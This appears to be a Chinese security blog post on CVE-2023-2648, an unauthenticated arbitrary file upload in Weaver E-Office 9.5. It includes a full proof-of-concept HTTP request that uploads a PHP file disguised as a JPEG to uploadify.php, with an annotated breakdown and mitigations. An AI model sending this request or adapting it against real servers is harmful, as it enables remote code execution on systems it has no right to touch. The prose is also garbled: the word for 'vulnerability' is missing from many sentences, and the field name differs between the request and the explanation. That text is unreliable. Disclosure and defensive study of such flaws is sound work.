Weaver E-Office v9.5 文件上传(CVE-2023-2648)

简介: Weaver E-Office v9.5 文件上传(CVE-2023-2648)

前言

CVE-2023-2648 是一个在 Weaver E-Office 9.5 版本中发现的严重。此位于文件 /inc/jquery/uploadify/uploadify.php 中,通过操控 Filedata 参数,可以进行不受限制的文件上传。这一允许上传可能包含危险类型的文件,并在应用程序环境中执行。该可以通过远程发起,且已被公开披露,构成了严重的安全风险。


此被分类为 CWE-434:不受限制的危险类型文件上传。根据 CVSS v3.1 评分,此的基本评分为 9.8,表明其严重性极高。这意味着它可以通过网络在无需用户交互或事先认证的情况下被利用,对保密性、完整性和可用性产生高影响 (NVD) (Tenable®) (MITRE CVE) (Aqua Vulnerability Database)。


对此的缓解措施包括:

实施严格的输入验证,确保仅允许指定的文件类型和内容。

使用白名单方法,根据已知的良好标准验证输入。

在沙盒环境中运行应用程序,以限制潜在利用的影响。

使用如 AppArmor 或 SELinux 等安全机制来强制执行文件操作的严格边界 (Aqua Vulnerability Database)。

有关更多详情,可以参考 MITRE CVE 网站 和 国家数据库。

介绍

Weaver E-Office是由泛微(Weaver)开发的一款标准办公自动化(OA)平台,主要面向中小型企业(SMEs)。该平台提供了超过30种应用,涵盖了知识管理、工作流、项目管理、客户管理、费用控制等多个业务功能,旨在提高企业的运营效率和业务流程的自动化程度 (Overview | e-office User Manual) (Weaver) (Weaver)。

功能概述

工作流协作:提供审批流程记录和统计报告,帮助标准化规则和流程。

知识系统:存储、检索和共享企业知识。

人力资源和行政管理:包括考勤管理、绩效考核、员工档案管理等。

费用管理:清晰的费用申请和报销流程,帮助控制费用。

项目管理:涵盖项目计划、执行和完成的全生命周期管理。

客户管理:提供企业级的客户管理,支持销售跟进和合同管理。

文档管理:集成业务记录和文件,提供智能化的文档工作流。

主要特点

易于维护和安装:支持私有部署,适合中小企业的需求。

预设模板:提供丰富的预设模板,帮助快速实现业务目标。

低代码开发:用户无需编程技能,通过拖拽即可创建定制化的应用。

跨平台部署:支持桌面和移动设备的集成使用。

使用场景

Weaver E-Office适用于多种业务场景,包括管理决策、员工入职、行政和人力资源管理、项目技术管理以及销售和客户服务等。通过整合不同模块的数据,企业可以更高效地运营,并更有效地利用业务洞察 (Weaver) (Weaver) (Weaver)。


安全性

系统具有“一键备份和快速数据恢复”功能,确保数据的安全性和可靠性。此外,它还提供简单易用的维护功能,是中小企业在一般管理和核心业务操作方面的最佳选择。


Weaver E-Office是一个高度灵活且功能强大的OA平台,能够帮助企业实现数字化协作和业务流程自动化,从而提升整体运营效率。

POC 分析

POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1
Host: xxxx8088
Content-Length: 204
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
 
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Fdiledata"; filename="uploadify.php."
Content-Type: image/jpeg
 
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
  1. HTTP 请求方法POST
  • 请求使用了 POST 方法,将数据上传到服务器。
  1. 请求路径/inc/jquery/uploadify/uploadify.php
  • 目标路径是 uploadify.php 文件,该文件是存在的部分。

头部信息

  • Host: 目标服务器地址(以 xxxx8088 作为示例)。
  • Content-Length: 请求体的长度。
  • Content-Type: 设置为 multipart/form-data,表示请求体中包含多个部分的数据。
  • User-Agent: 请求发送的客户端信息。
  • AcceptAccept-EncodingAccept-Language: 指定客户端接受的响应格式和语言。

请求体

  • Boundary:分隔符 ----WebKitFormBoundarydRVCGWq4Cx3Sq6tt 用于区分多个表单数据部分。
  • Content-Disposition:表明这是一个表单数据项,name="Filedata" 指定了表单字段名,filename="uploadify.php." 指定了上传的文件名。
  • Content-Type:虽然文件名是 .php,但类型被误导为 image/jpeg
  • 文件内容:PHP 代码 <?php phpinfo();?>,这是一个简单的 PHP 脚本,用于显示 PHP 的配置信息。

利用

  1. 文件上传:通过操控 Filedata 参数,将任意文件上传到服务器。由于文件类型检查不严格,攻击者可以上传包含恶意代码的 PHP 文件。
  2. 远程代码执行:上传的文件会在服务器上执行,导致远程代码执行。此处上传的 uploadify.php. 文件包含 PHP 代码 <?php phpinfo();?>,可在服务器上执行并显示 PHP 信息。

风险与防范

风险

  • 远程代码执行:可以上传并执行任意代码,完全控制服务器。
  • 信息泄露:通过上传恶意脚本,可以获取服务器上的敏感信息。

防范措施

  1. 严格验证文件类型:仅允许特定类型的文件上传,拒绝一切不符合要求的文件类型。
  2. 文件名检查:确保文件名没有危险的扩展名,例如 .php
  3. 使用白名单策略:仅接受已知良好的输入。
  4. 隔离上传目录:将上传的文件存储在一个仅允许有限权限访问的目录中,防止文件直接执行。

通过这些措施,可以有效减少此类被利用的风险。

复现

uploadify.php 上传成功,返回随机文件夹名称

相关文章
|
安全
CNVD-2021-49104——泛微E-Office文件上传漏洞
CNVD-2021-49104——泛微E-Office文件上传漏洞
584 1
CNVD-2021-49104——泛微E-Office文件上传漏洞
|
1月前
|
安全
猿大师办公助手在线编辑微软Office/金山wps网页组件COM加载项启用说明
猿大师办公助手是一款独特的在线编辑Office插件,不同于其他厂商的弹窗模式,它真正实现了网页内嵌本机Office。其COM加载项可在Office主菜单栏增加PageHi子菜单,提供文件保存、打印等功能,并能控制文档操作权限。安装后,默认自动启动COM加载项,但需注意可能被禁用或拦截,必要时需手动启用。对于WPS和微软Office,均有详细的启用步骤。
39 3
猿大师办公助手在线编辑微软Office/金山wps网页组件COM加载项启用说明
|
2月前
|
人工智能 自然语言处理 安全
微软会将ChatGPT整合纳入Office套件吗?
微软会将ChatGPT整合纳入Office套件吗?
|
5月前
|
Web App开发 JavaScript 前端开发
2024年纯前端VUE在线编辑微软Office/金山WPS的Word/Excel文档
现在,随着数字化进程渗透到到各行各业,数据安全已经成为了数字化革命中的重要组成部分,而在线Office成在OA、ERP、文档系统中得到了广泛的应用,为我国的信息化事业也做出了巨大贡献。随着操作系统、浏览器及Office软件的不断升级和更新换代,加上国家对信息化、数字化系统要求的不断提升,一些厂家的WebOffice控件产品不断被淘汰出局,而现存的几个产品也存在以下几个问题:
666 5
2024年纯前端VUE在线编辑微软Office/金山WPS的Word/Excel文档
|
5月前
微软Office 2019
微软办公软件套件Microsoft Office 2019 专业增强版2024年4月批量许可版更新推送!Office2019正式版2018年10月份推出,主要为多人跨平台办公与团队协作打造。Office2019整合对过去三年在Office365里所有功能,包括对Word、Excel、PowerPoint、Outlook、Project、Visio、Access、Publisher的更新。
136 2
|
5月前
|
Web App开发 安全 前端开发
新一代WebOffice高版本谷歌Chrome打开、编辑、保存微软Office/金山WPS解决方案大盘点
随着互联网技术的不断发展,越来越多的企业开始采用在线办公模式,微软Office Word 是最好用的文档编辑工具,然而doc、docx、xls、xlsx、ppt、pptx等格式的Office文档是无法直接在浏览器中直接打开的,如果可以实现Web在线预览编辑OffIce,肯定会还带来了更高效、便捷的办公体验,为我们的工作带来了更多可能性。
724 5
SAP ABAP 系统同微软 Office 套件进行 Desktop Integration 的工作原理
SAP ABAP 系统同微软 Office 套件进行 Desktop Integration 的工作原理
|
人工智能 自然语言处理 Oracle
WAIC 2023 | 微软Office产品团队技术负责人蔡玮鑫:Copilot中大语言模型应用实践经验
WAIC 2023 | 微软Office产品团队技术负责人蔡玮鑫:Copilot中大语言模型应用实践经验
144 0
|
Web App开发 JSON 前端开发
猿大师办公助手可实现微软Office Word文档在线安全预览,并且禁止编辑、拷贝、截屏、录屏、保存、导出、打印等!
现在,随着数字化进程渗透到到各行各业,数据安全已经成为了数字化革命中的重要组成部分,而在线Office成在OA、ERP、文档系统中得到了广泛的应用,为我国的信息化事业也做出了巨大贡献。随着操作系统、浏览器及Office软件的不断升级和更新换代,加上国家对信息化、数字化系统要求的不断提升,一些厂家的WebOffice控件产品不断被淘汰出局,而现存的几个产品也存在以下几个问题
403 0
|
Web App开发 安全 内存技术
新版谷歌Chrome取消对PPAPI插件支持后,浏览器网页打开编辑保存微软Office、金山WPS文档解决方案
最近陆续看到一些大学发布公告,谷歌Chrome取消了对PPAPI插件支持,导致某些在线Office厂家产品将无法在谷歌Chrome107及以上版本运行,被迫更换360浏览器或者使用低版本Chrome浏览器苟延残喘。
382 0
新版谷歌Chrome取消对PPAPI插件支持后,浏览器网页打开编辑保存微软Office、金山WPS文档解决方案